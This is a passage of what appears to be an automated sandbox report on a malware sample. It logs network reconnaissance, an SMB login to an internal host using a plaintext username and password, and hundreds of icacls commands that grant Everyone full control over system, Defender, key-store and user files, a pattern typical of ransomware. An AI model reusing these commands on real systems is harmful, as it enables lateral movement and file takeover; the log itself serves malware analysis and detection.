  - Suspicious use of AdjustPrivilegeToken
  PID:6476
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:6492
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:6604
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.33 /USER:
  2⤵
  PID:6628
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.33 /USER:ragulin Steel_Rat_2020
  2⤵
  PID:7040
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp141D.bat
  2⤵
  PID:3164
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:3440
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:3852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4028
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  PID:3184
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:932
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:3732
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:2124
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:2812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q
  2⤵
  PID:280
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q
  2⤵
  PID:2332
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:3260
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6476
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:3132
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:5800
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:3420
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:3448
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:2452
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:2496
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:6556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:6928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:900
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:4724
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:3104
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:1860
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:3920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:3364
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:2400
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:3700
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:6648
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:3012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6408
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:6684
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant Everyone:F /T /C /Q
  2⤵
  PID:4660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2200
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:6440
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2572
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:6456
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4468
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:6704
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7000
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07747e05\DMI7DF5.tmp.log.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:2516
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:2948
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:5660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:2448
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:6628
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:3284
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2412
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:5736
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:3584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:3084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:2584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
  2⤵
  PID:2408
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:2244
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant Everyone:F /T /C /Q
  2⤵
  PID:2624
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{73B1DD16-5F6E-4703-817D-F411AA517EC7}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:5676
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:2596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{A9642826-38E6-4A6F-A253-1839AB5002E3}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:3044
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6F95B335-B27B-43AB-99B0-FE819F4F3284}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:4692
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant Everyone:F /T /C /Q
  2⤵
  PID:436
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant Everyone:F /T /C /Q
  2⤵
  PID:2604
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant Everyone:F /T /C /Q
  2⤵
  PID:4916
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5732
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant Everyone:F /T /C /Q
  2⤵
  PID:3388
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2108
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5740
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:4576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1404
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:2836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:5908
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1372
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5696
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:2988
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:2532
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:5604
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:4052
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:4024
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:4812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:3248
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:2240
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:5944
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant Everyone:F /T /C /Q
  2⤵
  PID:3068
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant Everyone:F /T /C /Q
  2⤵
  PID:3908
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:3476
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:3500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:4600
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2228
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5092
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3528
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3120
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3548
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:2588
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5924
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2696
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:4424
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3404
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_property.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2208
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3492
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3688
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2104
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4056
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\netfol.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5352
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6116
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ringtones.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2340
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2312
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\sync.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4000
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\wmp.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5388
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3096
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2888
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2656
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6388
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6372
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5324
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q
  2⤵
  PID:3004
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2460
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant Everyone:F /T /C /Q
  2⤵
  PID:7140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\deployment.properties /grant Everyone:F /T /C /Q
  2⤵
  PID:2916
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:4516
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:7124
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompleteUse.dib /grant Everyone:F /T /C /Q
  2⤵
  PID:2220
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompareCopy.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:5372
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompressSync.svg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4128
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompressSubmit.cr2 /grant Everyone:F /T /C /Q
  2⤵
  PID:2080
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DisableMerge.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:5688
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConnectInstall.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:6448
- C:\Windows\system32\icacls.exe
